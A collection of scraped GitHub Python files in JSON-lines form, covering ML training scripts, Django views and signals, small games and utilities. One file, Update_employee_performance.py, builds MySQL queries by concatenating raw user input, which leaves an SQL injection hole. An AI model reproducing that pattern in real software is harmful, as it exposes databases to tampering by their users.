0)\n # connected-component analysis\n # mask to bbox\n # the results are not great\n lbl = measure.label(binary_image)\n props = measure.regionprops(lbl)\n # bbox x_min,y_min,x_max,y_max\n for prop in props:\n bbox = prop.bbox\n confidence = self.get_confidence(class_i_image_numpy, bbox)\n csv_writer.writerow([class_dict_reverse[class_i], str(\"%06d\" % (image_id+1))+'.xml', confidence, bbox[0], bbox[1], bbox[2], bbox[3]])\n\n\n\n def adjust_learning_rate(self, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 after args.lr_decay_step steps\"\"\"\n lr = self.learning_rate * (0.1 ** (epoch // self.lr_decay_step))\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\n\n\n\n\n\n","repo_name":"YangHai-1218/optical_comp_exercise","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
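A tiny end-to-end illustration of the mask-to-bounding-box step used in get_bbox() in the record above: threshold a confidence map, label connected components with skimage, and read each region's bbox as (min_row, min_col, max_row, max_col):

import numpy as np
from skimage import measure

conf = np.zeros((8, 8))
conf[1:3, 1:4] = 0.9   # one blob
conf[5:7, 5:7] = 0.8   # another blob
binary = np.where(conf >= 0.5, 1, 0)

lbl = measure.label(binary)          # 1, 2, ... per connected component
for prop in measure.regionprops(lbl):
    print(prop.bbox)                 # (1, 1, 3, 4) then (5, 5, 7, 7); max indices are exclusive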
+{"seq_id":"24125117693","text":"import re\n\nfrom django.db.models.signals import m2m_changed, post_save, pre_delete\nfrom django.dispatch import receiver\nfrom django.urls import reverse\n\nfrom .models import Entry, Notification, User\n\n\n@receiver(post_save, sender=Entry)\ndef entry_notification(sender, instance, created, **kwargs):\n \"\"\"\n Signal used to create notification(s) when an entry is created\n This function notifies an user if this entry is a reply to him.\n This function notifies an user if he's mentioned (by @username) in one's entry\n \"\"\"\n if created:\n # First find usernames mentioned (by @ tag)\n p = re.compile(r\"^(@)(\\w+)$\")\n usernames = set(\n [\n p.match(c).group(2).lower()\n for c in instance.content.split()\n if p.match(c)\n ]\n )\n # Remove the author of an entry from users to notify\n if instance.user.username in usernames:\n usernames.remove(instance.user.username)\n # If entry has a parent and it's parent is not the same author then notify about a reply\n # and delete from usernames if being notified\n if instance.parent and instance.parent.user.username != instance.user.username:\n if instance.parent.user.username in usernames:\n usernames.remove(instance.parent.user.username)\n Notification.objects.create(\n type=\"user_replied\",\n sender=instance.user,\n target=instance.parent.user,\n object=instance,\n )\n # Notify mentioned users without the author of an entry\n for name in usernames:\n if name == instance.user.username:\n continue\n try:\n target = User.objects.get(username=name)\n except Exception:\n continue\n Notification.objects.create(\n type=\"user_mentioned\",\n sender=instance.user,\n target=target,\n object=instance,\n )\n\n\n@receiver(m2m_changed, sender=Entry.tags.through)\ndef entry_tag_notification(instance, action, **kwargs):\n \"\"\"\n Notifies users if one of the tags in entry is observed by them.\n \"\"\"\n if not instance.modified_date and \"post\" in action:\n already_notified = set()\n reversed_user = reverse(\n \"user-detail-view\", kwargs={\"username\": instance.user.username}\n )\n reversed_entry = reverse(\"entry-detail-view\", kwargs={\"pk\": instance.pk})\n all_tags = instance.tags.all().prefetch_related(\"observers\", \"blacklisters\")\n all_blacklisters = [\n blacklister for tag in all_tags for blacklister in tag.blacklisters.all()\n ]\n to_create = []\n for tag in all_tags:\n for observer in tag.observers.all():\n # If user blacklisted one of the tags in an entry, don't notify him.\n if observer in all_blacklisters:\n continue\n if (\n observer.username == instance.user.username\n or observer in already_notified\n ):\n continue\n reversed_tag = reverse(\"tag\", kwargs={\"tag\": tag.name})\n content = (\n f'{instance.user.username} used tag #{tag.name}'\n f' in \"{instance.content:.25}...\"'\n )\n to_create.append(\n Notification(\n type=\"tag_used\",\n sender=instance.user,\n target=observer,\n object=instance,\n content=content,\n )\n )\n already_notified.add(observer)\n Notification.objects.bulk_create(to_create)\n","repo_name":"piotr-kopacki/bloggy","sub_path":"app/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"12001583524","text":"from tabulate import tabulate\n\ndef update_performance(mydb, id):\n mycursor = mydb.cursor()\n print()\n print('---Update Performance----')\n print('Employees Under me:')\n mycursor.execute('SELECT employee_id, name from employee_personal_info WHERE manager_id = ' + str(id))\n data = mycursor.fetchall()\n result =[]\n for x in data:\n result.append([x[0], x[1]])\n print(tabulate(result, headers=['Employee Id', 'Name']))\n print(\"Enter Employee ID: \")\n emp_id = input()\n mycursor.execute(\n 'SELECT * from employee_personal_info WHERE employee_id = ' + str(emp_id) + ' and manager_id = ' + str(id))\n data = mycursor.fetchall()\n\n if (len(data) == 0):\n print(\"Invalid Employee ID\")\n\n else:\n mycursor.execute('SELECT * from Employee_Performance WHERE id = ' + str(emp_id));\n performance_data = mycursor.fetchall()\n\n print(\"Tasks Completed: \" + str(performance_data[0][1]))\n print(\"Backlogs: \" + str(performance_data[0][2]))\n print(\"Communication Skills: \" + str(performance_data[0][3]))\n print(\"Output Quality: \" + str(performance_data[0][4]))\n print(\"Analytic Skills: \" + str(performance_data[0][5]))\n\n print()\n print(\"Update Tasks Completed (-1 for no change): \")\n new_task = input()\n if (new_task == '-1'):\n new_task = str(performance_data[0][1])\n\n print(\"Update Backlogs (-1 for no change): \")\n new_backs = input()\n if (new_backs == '-1'):\n new_backs = str(performance_data[0][2])\n\n print(\"Update Communication Skills (-1 for no change): \")\n new_comm = input()\n if (new_comm == '-1'):\n new_comm = str(performance_data[0][3])\n\n print(\"Update Output Quality (-1 for no change): \")\n new_qual = input()\n if (new_qual == '-1'):\n new_qual = str(performance_data[0][4])\n\n print(\"Update Analytic Skills (-1 for no change): \")\n new_skill = input()\n if (new_skill == '-1'):\n new_skill = str(performance_data[0][5])\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET task_complete = ' + str(new_task) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET backlogs = ' + str(new_backs) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET comm_skill = ' + str(new_comm) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET output_quality = ' + str(new_qual) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET analytic_skill = ' + str(new_skill) + ' WHERE id = ' + str(\n emp_id))\n mydb.commit()\n print('Update Done')\n mycursor.close()\n return\n\n","repo_name":"anushika99/Employee_Management_system_database_project","sub_path":"Update_employee_performance.py","file_name":"Update_employee_performance.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"19148865175","text":"import numpy as np\nimport matplotlib.pyplot as plt\nM = [0.052, 0.124, 0.168, 0.236, 0.284, 0.336] #y\nfi = [0.1745, 0.3491, 0.5236, 0.6981, 0.8727, 1.0472] #x\n\nxy = []\nfor i in range(6):\n xy.append(M[i]*fi[i])\n\nx2 = []\nfor i in range(6):\n x2.append(fi[i]**2)\n\ny2 = []\nfor i in range(6):\n y2.append(M[i]**2)\n\na = np.average(xy)/np.average(x2)\ndevi = np.sqrt(1/6*(np.average(y2)/np.average(x2) - a**2))\n\nprint(\"modul torzije: {} +/- {}\".format(a, devi))\n\nplt.plot(fi, M, '*')\ny = []\nfor i in range(6):\n y.append(fi[i]*a)\nplt.plot(fi, y)\nplt.show()","repo_name":"IrisButigan/PAF","sub_path":"Vjezbe/Vjezbe_3/linregress.py","file_name":"linregress.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8043638733","text":"from data import question_data\nfrom question_model import Question\nfrom quiz_brain import QuizBrain\nquestion_bank=[]\nfor i in range(len(question_data)):\n question_bank.append(Question(question_data[i]['question'], question_data[i]['correct_answer']))\n #print(question_bank[i].text)\n #print(question_bank[i].answer)\nquiz = QuizBrain(question_bank)\nwhile quiz.still_has_questions():\n quiz.show_question()\n\nprint(\"The quiz has ended\")\nprint(f\"Yor final score is: {quiz.score}/{quiz.question_number}\")\n","repo_name":"joelorellana/PythonBootCamp","sub_path":"DAY017/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20782765882","text":"import os\nfrom time import sleep\nfrom examples import cg_md, ind, rmd\n\nclass construtor:\n \n def __init__(self, pwd):\n dir = {}\n dir['src'] = 'src'\n dir['tests'] = 'tests'\n dir['docs'] = 'docs'\n dir['abs'] = pwd #os.getcwd() \n\n file = {}\n file['1'] = '/__init__.py'\n file['2'] = '/module1.py'\n file['3'] = '/module2.py'\n\n test_file1 = '/test_module1.py'\n test_file2 = '/test_module2.py'\n\n docs_file1 = '/index.md'\n docs_file2 = '/user_guide.md'\n docs_file3 = '/contribution_guide.md'\n\n\n dir_src = os.path.join(dir['abs'], dir['src'])\n dir_tests = os.path.join(dir['abs'], dir['tests'])\n dir_docs = os.path.join(dir['abs'], dir['docs'])\n\n if not os.path.exists(dir_src):\n os.makedirs(dir_src)\n file = open(dir_src + file['1'], \"w\")\n sleep(1)\n file = open(dir_src + file['2'], \"w\")\n sleep(1)\n file = open(dir_src + file['3'], \"w\")\n sleep(1)\n file.close()\n print('Diretório SRC criado com sucesso! ')\n\n else:\n print(f'Ja existe o diretório {dir[\"src\"]} ')\n \n if not os.path.exists(dir_tests):\n os.makedirs(dir_tests)\n file = open(dir_tests + test_file1, 'w')\n file = open(dir_tests + test_file2, \"w\")\n print('Diretório TESTS criado com sucesso! ')\n \n else:\n print(f'Ja existe o diretório {dir[\"tests\"]} ')\n \n if not os.path.exists(dir_docs):\n os.makedirs(dir_docs)\n file = open(dir_docs + docs_file1, 'w')\n file.write(ind)\n file = open(dir_docs + docs_file2, \"w\")\n file = open(dir_docs + docs_file3, \"w\")\n file.write(cg_md)\n print('Diretório DOCS criado com sucesso! ')\n file.close()\n else:\n print(f'Ja existe o diretório {dir[\"docs\"]} ')\n\n if not os.path.exists(dir['abs']+'/README.md'):\n file = open(dir['abs'] + '/README.md', \"w\")\n file.write(rmd)\n else:\n print('Arquivo README.md já existe no diretório!')\n \n if not os.path.exists(dir['abs']+ '/requirements.txt'):\n file = open(dir['abs'] + '/requirements.txt', \"w\")\n else:\n print('Arquivo requirements.txt já existe no diretório!')\n\ntry:\n pwd = str(input('Digite o diretório do projeto: ').strip()) \nexcept KeyboardInterrupt:\n\n print('Cancelado pelo usuário') \ntry:\n if __name__==\"__main__\":\n construtor(pwd)\nexcept NameError:\n pass","repo_name":"eusouanderson/construtor","sub_path":"construtor.py","file_name":"construtor.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18902466558","text":"import turtle\nimport random\n\nt = turtle.Turtle()\nt.up()\nt.goto(-100,100)\nt.down()\nt.speed(0)\n\n# race field\nfor i in range(15):\n t.write(i)\n t.right(90)\n t.fd(200)\n t.up()\n t.bk(200)\n t.left(90)\n t.down()\n t.fd(20)\n\n# On your marks...\n#first racer\nr1 = turtle.Turtle()\nr1.up()\nr1.shape(\"turtle\")\nr1.color(\"red\")\nr1.goto(-120,70)\nr1.down()\n#second racer\nr2 = turtle.Turtle()\nr2.up()\nr2.shape(\"turtle\")\nr2.color(\"blue\")\nr2.goto(-120,40)\nr2.down()\n#third racer\nr3 = turtle.Turtle()\nr3.up()\nr3.shape(\"turtle\")\nr3.color(\"yellow\")\nr3.goto(-120,10)\nr3.down()\n#Add the fans\ngoto = -120\nnumber = random.randint(1,10)\nfor i in range(number):\n rf = random.randint(0,255)\n gf = random.randint(0,255)\n bf = random.randint(0,255)\n goto = goto + 30\n fan = turtle.Turtle()\n fan.shape(\"turtle\")\n fan.up()\n fan.color(rf, gf, bf)\n fan.goto(goto,-120)\n fan.left(90)\n#guessing\nwin = input (\"Which turtle will win:\")\ntext = turtle.Turtle()\ntext.up()\ntext.goto(-120,120)\ntext.write(\"You think that the winner will be \" + win)\n#go!\nr1_dist = 0\nr2_dist = 0\nr3_dist = 0\nwhile True:\n if r1_dist >= 305:\n text.clear()\n text.write(\"And the winner of this race is red!\")\n break\n elif r2_dist >= 305:\n text.clear()\n text.write(\"And the winner of this race is blue!\")\n break\n elif r3_dist >= 305:\n text.clear()\n text.write(\"And the winner of this race is yellow!\")\n break\n else:\n r1m = random.randint(1,5)\n r2m = random.randint(1,5)\n r3m = random.randint(1,5)\n r1_dist = r1_dist + r1m\n r2_dist = r2_dist + r2m\n r3_dist = r3_dist + r3m\n r1.fd(r1m)\n r2.fd(r2m)\n r3.fd(r3m)\n\n","repo_name":"renzo-spiteri/kodland-python-course","sub_path":"Turtle Race/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"108996758","text":"import json\nimport logging\nimport imaplib\nimport time\nimport email\nimport subprocess\nimport shlex\nimport shared_variables_mc\n\nfrom mex_master_controller.MexOperation import MexOperation\n\nlogger = logging.getLogger(__name__)\n\n\nclass Role(MexOperation):\n def __init__(self, root_url, prov_stack=None, token=None, super_token=None, thread_queue=None):\n super().__init__(root_url=root_url, prov_stack=prov_stack, token=token, super_token=super_token, thread_queue=thread_queue)\n\n #self.create_url = '/usercreate'\n #self.delete_url = '/auth/user/delete'\n self.showuser_url = '/auth/role/showuser'\n self.showperms_url = '/auth/role/perms/show'\n #self.update_url = '/auth/user/update'\n #self.update_restricted_url = '/auth/restricted/user/update'\n\n# def _build(self, username=None, password=None, email_address=None, metadata=None, locked=None, family_name=None, given_name=None, nickname=None, enable_totp=None, role=None, organization=None, use_defaults=True):\n# if username == 'default':\n# username = shared_variables_mc.username_default\n# \n# if use_defaults:\n# if username is None: username = shared_variables_mc.username_default\n# if password is None: password = shared_variables_mc.password_default\n# if email_address is None: email_address = username + '@email.com'\n#\n# shared_variables_mc.username_default = username\n# shared_variables_mc.password_default = password\n#\n# user_dict = {}\n#\n# if username is not None:\n# user_dict['name'] = username\n# if password is not None:\n# user_dict['passhash'] = password\n# if email_address is not None:\n# user_dict['email'] = email_address\n# if metadata is not None:\n# user_dict['metadata'] = metadata\n# if locked is not None:\n# user_dict['locked'] = locked\n# if family_name is not None:\n# user_dict['familyname'] = family_name\n# if given_name is not None:\n# user_dict['givenname'] = given_name\n# if nickname is not None:\n# user_dict['nickname'] = nickname\n# if enable_totp is not None:\n# user_dict['enabletotp'] = enable_totp\n# if role is not None:\n# user_dict['role'] = role\n# if organization is not None:\n# user_dict['orginaztion'] = organization \n#\n# return user_dict\n\n def role_show(self, token=None, role=None, organization=None, json_data=None, use_defaults=True, use_thread=False):\n msg_dict = {}\n\n return_show = self.show(token=token, url=self.showuser_url, json_data=json_data, use_defaults=use_defaults, use_thread=use_thread, message=msg_dict)\n return_list = []\n \n if role:\n for user in return_show:\n if user['role'] == role:\n return_list.append(user)\n\n elif organization:\n for user in return_show:\n if user['org'] == organization:\n return_list.append(user)\n\n else:\n return_list = return_show\n\n return return_list\n\n def role_perms(self, token=None, role=None, json_data=None, use_defaults=True, use_thread=False):\n msg_dict = {}\n\n return_show = self.show(token=token, url=self.showperms_url, json_data=json_data, use_defaults=use_defaults, use_thread=use_thread, message=msg_dict)\n return_list = []\n\n if role:\n for user in return_show:\n if user['role'] == role:\n return_list.append(user)\n else:\n return_list = return_show\n\n return return_list\n\n\n","repo_name":"mobiledgex/edge-cloud-qa","sub_path":"modules/mex_master_controller/Role.py","file_name":"Role.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3460005160","text":"import os\nimport cv2\n\ndef resize_image(image, new_height):\n height, width, _ = image.shape\n new_width = int(width * (new_height / height))\n return cv2.resize(image, (new_width, new_height))\n\ndef images_to_video(image_folders, output_video_path, duration_per_frame=2):\n num_folders = len(image_folders)\n image_files = [sorted([f for f in os.listdir(folder) if f.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))]) for folder in image_folders]\n \n if not all(image_files):\n print(\"Image files not found in one or more folders.\")\n return\n \n num_images_per_folder = [len(files) for files in image_files]\n \n if len(set(num_images_per_folder)) != 1:\n print(\"All folders must contain the same number of image files.\")\n return\n \n frame_rate = 1 / duration_per_frame\n images = [cv2.imread(os.path.join(image_folders[i], image_files[i][0])) for i in range(num_folders)]\n max_height = max(image.shape[0] for image in images)\n images = [resize_image(image, max_height) for image in images]\n total_width = sum(image.shape[1] for image in images)\n video_writer = cv2.VideoWriter(output_video_path, cv2.VideoWriter_fourcc(*'mp4v'), frame_rate, (total_width, max_height))\n\n for img_set in zip(*image_files):\n frame_images = []\n for i, img_name in enumerate(img_set):\n image = cv2.imread(os.path.join(image_folders[i], img_name))\n image = resize_image(image, max_height)\n frame_images.append(image)\n \n combined_frame = cv2.hconcat(frame_images)\n\n for _ in range(int(duration_per_frame * frame_rate)):\n video_writer.write(combined_frame)\n\n video_writer.release()\n print(\"Video creation completed successfully.\")\n\nif __name__ == \"__main__\":\n script_name = \"persam_f/\"\n img_cat_name = \"pizza2\"\n image_folders = [\n \"/home/cgv/Personalize-SAM/outputs/\" + script_name + img_cat_name + \"/bad\", \n \"/home/cgv/Personalize-SAM/outputs/\" + script_name + img_cat_name + \"/vis/bad\", \n ]\n output_video = \"/home/cgv/Personalize-SAM/outputs/video/\" + script_name + img_cat_name + \".mp4\"\n images_to_video(image_folders, output_video)\n","repo_name":"Rickyeeeeee/MyPerSAM","sub_path":"utils/image2video.py","file_name":"image2video.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37836903199","text":"\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n\n\ndef register(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/')\n else:\n password = request.POST['password']\n print(password)\n password_confirm = request.POST['password_confirm']\n pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()) \n pw_hash_confirm = bcrypt.hashpw(password_confirm.encode(), bcrypt.gensalt()) \n print(pw_hash)\n User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], password=pw_hash, password_confirm=pw_hash_confirm, \n email=request.POST['email'], birth_date=request.POST['birth_date']) \n print(\"its working\")\n\n return redirect(\"/book\")\n \ndef login(request):\n if not User.objects.loginValid(request):\n return redirect('/')\n else:\n theuser = User.objects.filter(email=request.POST['email']) \n if theuser: \n logged_user = theuser[0] \n request.session['userid'] = logged_user.id\n return redirect('/book')\n return redirect('/')\n\ndef index(request):\n if request.session.get(\"userid\"):\n return redirect(\"/book\")\n return render(request,\"FavBooksApp/index.html\")\n\ndef presuccess(request):\n uid = request.session.get(\"userid\")\n if not uid:\n return redirect(\"/\")\n context = {\n \"thisuser\" : User.objects.get(id=uid),\n \"allbooks\" : Book.objects.all(),\n \"this_user\" : User.objects.get(id=uid)\n\n\n \n }\n return render(request,\"FavBooksApp/success.html\",context)\n\ndef logout(request):\n del request.session['userid'] \n return redirect(\"/\")\n\n################^^^^^^^^^^^THE ABOVE CODE IS FOR REGISTRATION AND LOGIN^^^^^^^^^^^^######################\n\ndef addingbook(request):\n errors = User.objects.book_add_valid(request)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/book')\n else:\n if request.session.get(\"userid\"):\n this_user_session_id= request.session.get(\"userid\")\n print(this_user_session_id)\n this_user_obj= User.objects.get(id= this_user_session_id)\n print(this_user_obj.first_name)\n # print(for key in )\n new_book_adding = Book.objects.create(title=request.POST[\"titleName\"],desc=request.POST[\"descriptionName\"],uploaded_by = this_user_obj)\n print(new_book_adding)\n this_user = User.objects.get(id=this_user_session_id)\n print(this_user)\n new_book_adding.users_who_fav.add(this_user)\n return redirect (\"/book\")\n return render(request,\"FavBooksApp/index.html\")\n\ndef favorite(request,id):\n if request.session.get(\"userid\"):\n the_book_being_liked= id\n this_user_session_id= request.session.get(\"userid\")\n this_book = Book.objects.get(id=the_book_being_liked)\n this_user = User.objects.get(id=this_user_session_id)\n print(this_book)\n print(this_user)\n print(this_user_session_id)\n print(the_book_being_liked)\n this_book.users_who_fav.add(this_user)\n\n return redirect (\"/book\") \n return render(request,\"FavBooksApp/index.html\")\n\n\n\ndef books_page(request,id):\n if request.session.get(\"userid\"):\n the_book_being_liked= id\n this_user_session_id= request.session.get(\"userid\")\n this_book = Book.objects.get(id=the_book_being_liked)\n this_user = User.objects.get(id=this_user_session_id)\n context={\n \"book\": Book.objects.get(id=id),\n \"users\": User.objects.all(),\n \"users_header\": this_user,\n 
\"users_fav\":this_book.users_who_fav.all()\n }\n\n return render(request,\"FavBooksApp/books_page.html\",context)\n return render(request,\"FavBooksApp/index.html\")\n\n\ndef unfavorite(request,id):\n if request.session.get(\"userid\"):\n the_book_being_liked= id\n this_user_session_id= request.session.get(\"userid\")\n this_book = Book.objects.get(id=the_book_being_liked)\n this_user = User.objects.get(id=this_user_session_id)\n print(this_book)\n print(this_user)\n print(this_user_session_id)\n print(the_book_being_liked)\n this_book.users_who_fav.remove(this_user)\n # print(\"lets see this\")\n # the_book_being_liked= id\n # this_user_session_id= request.session.get(\"userid\")\n # the_user_final= User.objects.get(id=this_user_session_id)\n \n # print(\"lets see this\")\n # if the_user_final in users_that_fav.books_liked.all():\n # # (id=this_user_session_id):\n # print(\"KJBKJ KJNJKBKJBKJNBKJNKNKBNKJN \")\n # this_book = Book.objects.get(id=the_book_being_liked)\n # this_user = User.objects.get(id=this_user_session_id)\n # this_book.users_who_fav.remove(this_user)\n return redirect (\"/book\") \n return render(request,\"FavBooksApp/index.html\")\n\ndef editbook(request,id):\n errors = User.objects.book_add_valid(request)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/book')\n else:\n if request.session.get(\"userid\"):\n the_book_being_edited= id\n this_book = Book.objects.get(id=the_book_being_edited)\n this_book.title = request.POST['titleName']\n this_book.desc = request.POST['descriptionName']\n this_book.save()\n\n return redirect('/book')\n return render(request,\"FavBooksApp/index.html\")\n\ndef delete(request,id):\n if request.session.get(\"userid\"):\n the_book_being_deleted= id\n this_book = Book.objects.get(id=the_book_being_deleted)\n this_book.delete()\n return redirect('/book')\n return render(request,\"FavBooksApp/index.html\")\n\n\n\ndef fav_books(request):\n if request.session.get(\"userid\"):\n this_user_session_id= request.session.get(\"userid\")\n this_user= User.objects.get(id=this_user_session_id)\n\n context={\n \"users\": this_user.books_liked.all(),\n \"this_user\": this_user\n }\n\n return render(request,\"FavBooksApp/favs.html\",context)\n return render(request,\"FavBooksApp/index.html\")\n # if request.session.get(\"userid\") == Book.objects.uploaded_by.get(id=id):\n # the_book_being_liked= id\n # this_user_session_id= request.session.get(\"userid\")\n # this_book = Book.objects.get(id=the_book_being_liked)\n # this_user = User.objects.get(id=this_user_session_id)\n # context={\n # \"book\": Book.objects.get(id=id),\n # \"users\": User.objects.all(),\n # \"users_header\": this_user,\n # \"users_fav\":this_book.users_who_fav.all()\n # }\n\n # else:\n\n\n\n\n","repo_name":"Nassertakkesh/FavBooks","sub_path":"apps/FavBooksApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34700659101","text":"import torch\nfrom torch import nn\nimport numpy as np\n\nfrom typing import Tuple, Union, List, Callable\nfrom torch.optim import SGD\nimport torchvision\nfrom torch.utils.data import DataLoader, TensorDataset, random_split\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\n\ndef linear_model() -> nn.Module:\n \"\"\"Instantiate a linear model and send it to device.\"\"\"\n model = nn.Sequential(nn.Flatten(),nn.Linear(d, 10))\n return model.to(DEVICE)\n\ndef train(\n model: nn.Module, optimizer: SGD,\n train_loader: DataLoader, val_loader: DataLoader,\n epochs: int = 20\n)-> Tuple[List[float], List[float], List[float], List[float]]:\n \"\"\"\n Trains a model for the specified number of epochs using the loaders.\n\n Returns: \n Lists of training loss, training accuracy, validation loss, validation accuracy for each epoch.\n \"\"\"\n\n loss = nn.CrossEntropyLoss()\n train_losses = []\n train_accuracies = []\n val_losses = []\n val_accuracies = []\n for e in tqdm(range(epochs)):\n model.train()\n train_loss = 0.0\n train_acc = 0.0\n\n # Main training loop; iterate over train_loader. The loop\n # terminates when the train loader finishes iterating, which is one epoch.\n for (x_batch, labels) in train_loader:\n x_batch, labels = x_batch.to(DEVICE), labels.to(DEVICE)\n optimizer.zero_grad()\n labels_pred = model(x_batch)\n batch_loss = loss(labels_pred, labels)\n train_loss = train_loss + batch_loss.item()\n\n labels_pred_max = torch.argmax(labels_pred, 1)\n batch_acc = torch.sum(labels_pred_max == labels)\n train_acc = train_acc + batch_acc.item()\n\n batch_loss.backward()\n optimizer.step()\n train_losses.append(train_loss / len(train_loader))\n train_accuracies.append(train_acc / (B_SIZE * len(train_loader)))\n\n # Validation loop; use .no_grad() context manager to save memory.\n model.eval()\n val_loss = 0.0\n val_acc = 0.0\n\n with torch.no_grad():\n for (v_batch, labels) in val_loader:\n v_batch, labels = v_batch.to(DEVICE), labels.to(DEVICE)\n labels_pred = model(v_batch)\n v_batch_loss = loss(labels_pred, labels)\n val_loss = val_loss + v_batch_loss.item()\n\n v_pred_max = torch.argmax(labels_pred, 1)\n batch_acc = torch.sum(v_pred_max == labels)\n val_acc = val_acc + batch_acc.item()\n val_losses.append(val_loss / len(val_loader))\n val_accuracies.append(val_acc / (B_SIZE * len(val_loader)))\n\n return train_losses, train_accuracies, val_losses, val_accuracies\n\ndef parameter_search(\n train_loader: DataLoader, \n val_loader: DataLoader, \n model_fn:Callable[[], nn.Module],\n lrs: List[float] = torch.linspace(1e-6, 1e-1, 5),\n epochs: int = 20\n) -> float:\n \"\"\"\n Parameter search for our linear model using SGD.\n\n Args:\n train_loader: the train dataloader.\n val_loader: the validation dataloader.\n model_fn: a function that, when called, returns a torch.nn.Module.\n lrs: a list of learning rates to try.\n num_iter: the number of iterations to train for.\n\n Returns:\n The learning rate with the least validation loss.\n NOTE: you may need to modify this function to search over and return\n other parameters beyond learning rate.\n \"\"\"\n best_loss = torch.tensor(np.inf)\n best_lr = 0.0\n\n if lrs is None:\n lrs = torch.linspace(10 ** (-6), 10 ** (-1), num_iter)\n\n for lr in lrs:\n print(f\"trying learning rate {lr}\")\n model = model_fn()\n optim = SGD(model.parameters(), lr)\n \n train_loss, train_acc, val_loss, val_acc = train(\n model, optim, train_loader, val_loader, epochs\n )\n\n if min(val_loss) < best_loss:\n best_loss = 
min(val_loss)\n            best_lr = lr\n        print(f\"Min loss: {min(val_loss)}, Min loss epoch: {np.argmin(val_loss)+1}/{epochs}\")\n    return best_lr\n\ndef evaluate(\n    model: nn.Module, loader: DataLoader\n) -> Tuple[float, float]:\n    \"\"\"Computes test loss and accuracy of model on loader.\"\"\"\n    loss = nn.CrossEntropyLoss()\n    model.eval()\n    test_loss = 0.0\n    test_acc = 0.0\n    with torch.no_grad():\n        for (batch, labels) in loader:\n            batch, labels = batch.to(DEVICE), labels.to(DEVICE)\n            y_batch_pred = model(batch)\n            batch_loss = loss(y_batch_pred, labels)\n            test_loss = test_loss + batch_loss.item()\n\n            pred_max = torch.argmax(y_batch_pred, 1)\n            batch_acc = torch.sum(pred_max == labels)\n            test_acc = test_acc + batch_acc.item()\n    test_loss = test_loss / len(loader)\n    test_acc = test_acc / len(loader.dataset)\n    return test_loss, test_acc\n\ndef eval_linear_model(best_lr: float = 0.015):\n    model = linear_model()\n    optimizer = SGD(model.parameters(), best_lr)\n\n    train_loss, train_accuracy, val_loss, val_accuracy = train(\n        model, optimizer, train_loader, val_loader, 20\n    )\n\n    epochs = range(1, 21)\n    plt.plot(epochs, train_accuracy, label=\"Train Accuracy\")\n    plt.plot(epochs, val_accuracy, label=\"Validation Accuracy\")\n    plt.xlabel(\"Epoch\")\n    plt.ylabel(\"Accuracy\")\n    plt.legend()\n    plt.title(\"Logistic Regression Accuracy for CIFAR-10 vs Epoch\")\n    plt.show()\n\n    test_loss, test_acc = evaluate(model, test_loader)\n    print(f\"Test Accuracy: {test_acc}\")\n\n# assert torch.cuda.is_available(), \"GPU is not available, check the directions above (or disable this assertion to use CPU)\"\nB_SIZE = 128\nLRS = [0.001, 0.005, 0.01, 0.025, 0.05]\nEPOCHS = 20\nTRAINING_SUBSET = 0.25\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(DEVICE) # this should print out CUDA\n\ntrain_dataset = torchvision.datasets.CIFAR10(\"./data\", train=True, download=True, transform=torchvision.transforms.ToTensor())\ntest_dataset = torchvision.datasets.CIFAR10(\"./data\", train=False, download=True, transform=torchvision.transforms.ToTensor())\norig_len = len(train_dataset)\ntrain_dataset = torch.utils.data.dataset.Subset(train_dataset, 